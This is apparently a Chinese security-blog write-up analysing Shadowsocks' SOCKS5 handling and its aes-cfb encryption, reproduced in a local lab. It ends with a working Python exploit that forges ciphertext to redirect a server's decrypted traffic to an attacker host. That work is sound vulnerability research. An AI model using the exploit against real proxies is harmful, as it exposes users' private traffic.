Shadowsocks漏洞复现
happi0 漏洞分析 7812浏览 · 2021-09-18 08:55

前言

本文主要分析了Shadowsocks的源码和密码学漏洞原理

socks5

一种网络协议, 由于支持tcpudp所以经常用于客户端和外部网络服务器之间的中间传输

socks5协议分析

本地写了个转发,监听在8081端口

通过代理访问pwnsky.com的流量包如下

通过psh包的跟踪tcp流量获取到如下流量包

内容如下, 有缩进的为服务端返回的数据

00000000  05 02 00 01                                        ....
    00000000  05 00                                              ..
00000004  05 01 00 01 76 c1 45 9e  00 50                     ....v.E. .P
    00000002  05 00 00 01 00 00 00 00  00 00                     ........ ..
0000000E  47 45 54 20 2f 20 48 54  54 50 2f 31 2e 31 0d 0a   GET / HT TP/1.1..
0000001E  48 6f 73 74 3a 20 70 77  6e 73 6b 79 2e 63 6f 6d   Host: pw nsky.com
0000002E  0d 0a 55 73 65 72 2d 41  67 65 6e 74 3a 20 63 75   ..User-A gent: cu
0000003E  72 6c 2f 37 2e 37 38 2e  30 0d 0a 41 63 63 65 70   rl/7.78. 0..Accep
0000004E  74 3a 20 2a 2f 2a 0d 0a  0d 0a                     t: */*.. ..

逐行分析

客户端第一次请求与服务端第一次回复
客户端
VER NMETHODS METHODS
0x05 1 1 TO 255
服务端
VER METHOD
0x05 1

VER 的值当被设置为 0x05,标明当前版本为Socks5

NMETHODS中包含在 METHODS 中出现的方法标识的数据,每种有各自对应的格式

  • 0x00  无需认证
  • 0x02  需要认证, 用户名/密码
  • 0xFF  无可接受方法
00000000  05 02 00 01                                        ....
    00000000  05 00                                              ..
客户端第二次回复
VER REP PSV ATYP BND.ADDR BND.PORT
0x05 1 0x00 1 Variable 2
  • VER: 0x05, 表明版本
  • REP: 只有0x00标识连接成功,其他的见手册
  • RSV: 保留字段,为0x00
  • AYTP: 目标地址, 0x01 <--> ipv4, 0x03 <--> 域名, 0x04 <--> ipv6
  • BND.ADDR: 服务器绑定地址
  • BND.PORT: 服务器绑定端口
00000004  05 01 00 01 76 c1 45 9e  00 50                     ....v.E. .P

完整流程

通过以上分析, 可总结, 完整连接流程为

  • tcp握手
  • 客户端请求连接
  • 如果收到 0x05 0x00 则可以建立连接
  • 发送 0x05 0x01 0x00 地址类型 + 目的地址 + 目的端口
  • 接受服务器返回的自身地址和端口

这只是一次简单的socks5协议抓包分析, 更详细的内容可以参考文档

RFC 1928 - SOCKS 5 协议中文文档「译」

源码分析

工作方式

user request <--> sslocal <--> ssserver <--> destination

可以理解为原本访问的流量是A <--> B

AB之间的流量可能被遮蔽或干扰

A <--> C <--encrypted--> D <--> B

AB没有直接通信, 中间所传输的数据都是加密后的, 所以被屏蔽或干扰的概率下降了很多

(主动嗅探等手段这里暂且不提)

模块介绍

一些重要的模块

  • tcprelay.py:TCP 代理的实现
  • udprelay.py: UDP 代理的实现
  • asyncdns.py:异步 DNS 查询
  • crypto:加密用到的依赖等
  • cryptor.py: 加密的接口
  • daemon.py:守护进程
  • shell.py:读取命令行参数,检查配置
  • local.py: 客户端
  • server.py: 服务器

local.py && server.py

程序入口

两者大致内容相似, 可归纳为

...
# 获取配置
config = shell.get_config(True)

# 是否用守护进程的方式运行
daemon.daemon_exec(config)

...

# 注册dns解析器、tcp转发器、udp转发器
dns_resolver = asyncdns.DNSResolver()
tcp_server = tcprelay.TCPRelay(config, dns_resolver, True)
udp_server = udprelay.UDPRelay(config, dns_resolver, True)

# 放入循环中
loop = eventloop.EventLoop()
dns_resolver.add_to_loop(loop)
tcp_server.add_to_loop(loop)
udp_server.add_to_loop(loop)

loop.run()
...

发包

这里首先需要确定是tcp还是udp流量, 然后交由tcprelay.pyudprelay.py处理

中间实现代码很复杂, 尤其是TCPRelay, TCPRelayHandler且和本文关系不大

我们主要看数据收发、加解密部分

def parse_header(data):
    addrtype = ord(data[0])
    dest_addr = None
    dest_port = None
    header_length = 0
    if addrtype & ADDRTYPE_MASK == ADDRTYPE_IPV4:
        if len(data) >= 7:
            dest_addr = socket.inet_ntoa(data[1:5])
            dest_port = struct.unpack('>H', data[5:7])[0]
            header_length = 7
        else:
            logging.warn('header is too short')
    elif addrtype & ADDRTYPE_MASK == ADDRTYPE_HOST:
        if len(data) > 2:
            addrlen = ord(data[1])
            if len(data) >= 4 + addrlen:
                dest_addr = data[2:2 + addrlen]
                dest_port = struct.unpack('>H', data[2 + addrlen:4 +
                                                     addrlen])[0]
                header_length = 4 + addrlen
            else:
                logging.warn('header is too short')
        else:
            logging.warn('header is too short')
    elif addrtype & ADDRTYPE_MASK == ADDRTYPE_IPV6:
        if len(data) >= 19:
            dest_addr = socket.inet_ntop(socket.AF_INET6, data[1:17])
            dest_port = struct.unpack('>H', data[17:19])[0]
            header_length = 19
        else:
            logging.warn('header is too short')
    else:
        logging.warn('unsupported addrtype %d, maybe wrong password or '
                     'encryption method' % addrtype)
    if dest_addr is None:
        return None
    return addrtype, to_bytes(dest_addr), dest_port, header_length

以上功能主要是:

判断数据为ipv4, 域名ipv6中的哪一种 并解析数据ip, port

返回地址类型addrtype,IPdest_addr,port dest_port,长度header_length

选择服务器

def _get_a_server(self):
    server = self._config['server']
    server_port = self._config['server_port']
    if type(server_port) == list:
        server_port = random.choice(server_port)
    if type(server) == list:
        server = random.choice(server)
    logging.debug('chosen server: %s:%d', server, server_port)
    return server, server_port

然后是从config里面随机选择一个服务端,这里tcp ,udp都一样

加密

udp
...
key, iv, m = cryptor.gen_key_iv(self._password, self._method)
...
try:
    data = cryptor.encrypt_all_m(key, iv, m, self._method, data,
                                 self._crypto_path)
...

首先生成key,iv, 跟踪进去查看生成方式

def gen_key_iv(password, method):
    method = method.lower()
    (key_len, iv_len, m) = method_supported[method]
    if key_len > 0:
        key, _ = EVP_BytesToKey(password, key_len, iv_len)
    else:
        key = password
    iv = random_string(iv_len)
    return key, iv, m

可以看到最后使用EVP_BytesToKey的方式生成key

tcp
data = self._cryptor.encrypt(data)
def encrypt(self, buf):
    if len(buf) == 0:
        return buf
    if self.iv_sent:
        return self.cipher.encrypt(buf)
    else:
        self.iv_sent = True
        return self.cipher_iv + self.cipher.encrypt(buf)

使用cipher.encrypt来加密

跟进去查看cipher的初始化

self.cipher = self.get_cipher(
    password, method, CIPHER_ENC_ENCRYPTION,
    random_string(self._method_info[METHOD_INFO_IV_LEN])
)

调用get_cipher来初始化

def get_cipher(self, password, method, op, iv):
    password = common.to_bytes(password)
    m = self._method_info
    if m[METHOD_INFO_KEY_LEN] > 0:
        key, _ = EVP_BytesToKey(password,
                                m[METHOD_INFO_KEY_LEN],
                                m[METHOD_INFO_IV_LEN])
    else:
        # key_length == 0 indicates we should use the key directly
        key, iv = password, b''
    self.key = key
    iv = iv[:m[METHOD_INFO_IV_LEN]]
    if op == CIPHER_ENC_ENCRYPTION:
        # this iv is for cipher not decipher
        self.cipher_iv = iv
    return m[METHOD_INFO_CRYPTO](method, key, iv, op, self.crypto_path)

可以看到最终也是使用EVP_BytesToKey来生成key

所以无论tcp还是udp的加密本质上是一样的, 只是中间调用的方式不同

进入EVP_BytesToKey查看

def EVP_BytesToKey(password, key_len, iv_len):
    # equivalent to OpenSSL's EVP_BytesToKey() with count 1
    # so that we make the same key and iv as nodejs version
    cached_key = '%s-%d-%d' % (password, key_len, iv_len)
    r = cached_keys.get(cached_key, None)
    if r:
        return r
    m = []
    i = 0
    while len(b''.join(m)) < (key_len + iv_len):
        md5 = hashlib.md5()
        data = password
        if i > 0:
            data = m[i - 1] + password
        md5.update(data)
        m.append(md5.digest())
        i += 1
    ms = b''.join(m)
    key = ms[:key_len]
    iv = ms[key_len:key_len + iv_len]
    cached_keys[cached_key] = (key, iv)
    return key, iv

其实就是用passwd作为种子, 根据key的长度来不断哈希来生成真正的key

加密完成后发送给服务端

收包

和发包相似, 流程大致如下

解密 --> 解析(ip, port等) --> dns查询 --> 创建socket --> ip过滤 --> 修改数据格式 --> 转发

由于tcpudp都是一样的, 这里用udp来简化研究, 在117行, 找到其中主要关注解密部分

data, key, iv = cryptor.decrypt_all(self._password,
                                    self._method,
                                    data, self._crypto_path)
def decrypt_all(password, method, data, crypto_path=None):
    result = []
    method = method.lower()
    (key, iv, m) = gen_key_iv(password, method)
    iv = data[:len(iv)]
    data = data[len(iv):]
    cipher = m(method, key, iv, CIPHER_ENC_DECRYPTION, crypto_path)
    result.append(cipher.decrypt_once(data))
    return b''.join(result), key, iv

首先根据password, 用gen_key_iv生成key, 和客户端一致

然后decrypt_allivdata分离出来(根据len(iv)), 然后把data拿去解密

总结

纵观整个流程, 其实通讯设计是比较简单的, 没用常见的校验签名等操作

数据结构:rand_iv + AES-cfb(key, rand_iv, data)

甚至连iv都是直接在数据开头, 全靠用password生成的key来保证安全

aes-cfb

基本原理

可参考wiki

原理图如下:

  • aes-cbc几乎相反 -- 首先进行aes加密, 然后与前一组异或
  • cfb模式加密解密过程一样, 因为最后一步是异或

实验

#!/usr/bin/python
from Crypto.Cipher import AES
import os

key = os.urandom(16)
iv = os.urandom(16)

pt = b'0'*16

# 加密
cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
tmp = cipher.encrypt(pt)
print(tmp)

# 解密
cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
tmp = cipher.decrypt(pt)
print(tmp)

# b'B\x99\xcf\xde\x97F\x901\xd1\xf2\x02\xba\xaaT\xafI'
# b'B\x99\xcf\xde\x97F\x901\xd1\xf2\x02\xba\xaaT\xafI'

伪造

由于最后一步是异或, 那么我们在已知明文、密文且拥有解密权限下的情况下就可以控制明文了

推导如下:

对于第一组密文, 首先对ivaes加密, 用作后面异或, 由于其值不变

可视为常量, 记作K, 密文记作ct, 明文记作pt, 需要伪造的明文为pt', 伪造的密文为ct'

根据已知

ct = pt xor K

那么在已知ptct的情况下, 可以求得K

K = ct xor pt

在已知K的情况下,

ct' = pt' xor K

即可伪造

#!/usr/bin/python
from Crypto.Cipher import AES
import os

key = os.urandom(16)
iv = os.urandom(16)

def xor(a,b):
    return bytes(x^y for x,y in zip(a,b))

pt = b'0'*16
pt_ = b'1'*16

cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
ct = cipher.encrypt(pt)

K = xor(ct, pt)

print("pt: ", pt)
print("pt_: ",pt_)
print("K : ", K)
print("ct: ", ct)
print("xor(K,pt): ", xor(K,pt))
print("xor(K,ct): ", xor(K,ct))
ct_ = xor(K,pt_)

cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
pt_ = cipher.decrypt(ct_)
print("pt_: ",pt_)

'''
pt:  b'0000000000000000'
pt_:  b'1111111111111111'
K :  b'\x9d\x04(\x07.u\xd8}\xff\xd9S\xb9*\x9e\x181'
ct:  b'\xad4\x187\x1eE\xe8M\xcf\xe9c\x89\x1a\xae(\x01'
xor(K,pt):  b'\xad4\x187\x1eE\xe8M\xcf\xe9c\x89\x1a\xae(\x01'
xor(K,ct):  b'0000000000000000'
pt_:  b'1111111111111111'
'''

利用

利用条件有两个关键点

  • aes-cfb
  • 已知明文、密文

由于在ss默认的加密方式就是aes-cfb,已知密文是自然, 已知明文可以通过sshttp包来推测

因为所有的http包开头的数据都差不多, 前八个字节为HTTP/1.1

攻击方法最早由奇虎360一位安全研究员提出

复现

config文件

编辑config文件在shadowsocks根目录下, 这里我选择local为20001端口, server为20002端口

{
    "server":"127.0.0.1",
    "local_port":20001,
    "server_port":20002,
    "password":"happi0",
    "timeout":60,
    "method":"aes-256-cfb",
    "local_address":"127.0.0.1",
    "fast_open":false
}

/srv/http编辑index.php文件,内容如下

<?php
echo "flag{cb9cd520a37a9c826841a8bcf3c20351}"
?>

本地、代理、服务端搭建

python server.py
python local.py
php -S 0.0.0.0:8008

测试代理是否正常

netstat -antup|grep LIS|grep "2000[12]"
tcp        0      0 127.0.0.1:20001         0.0.0.0:*               LISTEN      90020/python
tcp        0      0 127.0.0.1:20002         0.0.0.0:*               LISTEN      90021/python

测试http服务是否正常

用浏览器访问localhost:8080即可

访问测试

curl --socks5 127.0.0.1:20001 10.19.4.171:8080
2021-09-13 03:46:43 INFO     connecting 10.19.4.171:8080 from 127.0.0.1:35202
2021-09-13 03:46:43 INFO     connecting 10.19.4.171:8080 from 127.0.0.1:33480
flag{cb9cd520a37a9c826841a8bcf3c20351}

由于127.0.0.1在代理的黑名单里,换成局域网地址即可

抓包分析

wireshark监听即可

tcp.port == 20001 || tcp.port == 20002

前两次psh包握手过程, 不赘述

查看第三次握手包的data部分

0a1304ab 1f9010.19.4.171 8080

即接下来数据的目的地址

这里把curl的请求转发到local

然后local将请求加密转发到server

并且长度较为加密前增加了171-148 == 23 == 16的iv + 7的ipv4转发

最后server收到返回的数据后, 首先加密返回给local

local解密后返回最初的请求

且长度也是相差16的iv

利用

首先把密文给截取下来, 用上文描述的方法, 转发给server即可

这里参考

#!/usr/bin/python

import socket
import binascii
from Crypto.Util.number import long_to_bytes as lb

c = binascii.unhexlify("212aba32327c579d239a405770677e2ab1ca6f8288b9e59253917216b2034638c622293608b3a1dd843c71cf1fa704b95ee662c65fb14e1fca078643c6efb4f280a447d0493385dbbdf837f98e8b211749e1a738632b18fa2f1bb6a6ab83bb4c96035c611b79e1f36c2155493ddb8e4dc04c84297966959c4a4202c0bf51b1d0dbec1323b10bee1a4e3e3c58e3b8ee7796fdcaad638230fcf09f172e26271e2f0317481bde2cb1580f117a580908fb2ccac2d51a45a2976b56d41f6cca2227b17d76ddeb13390b8ddd3a7d92edada68a542b732c181ce43211e265")

def xor(a, b):
    return bytes(x^y for x,y in zip(a,b))

plain  = b"HTTP/1."
target = b"\x01" + lb(10) + lb(19) + lb(4) + lb(171) + lb(7777)
z = xor(plain, target)
new_c  = c[:16] + xor(z, c[16:16+7]) + b"\x00"*(16-7) + c

s = socket.socket()
s.connect(("127.0.0.1", 20002))
s.send(new_c)

效果如下

参考资料

3 条评论
某人
表情
可输入 255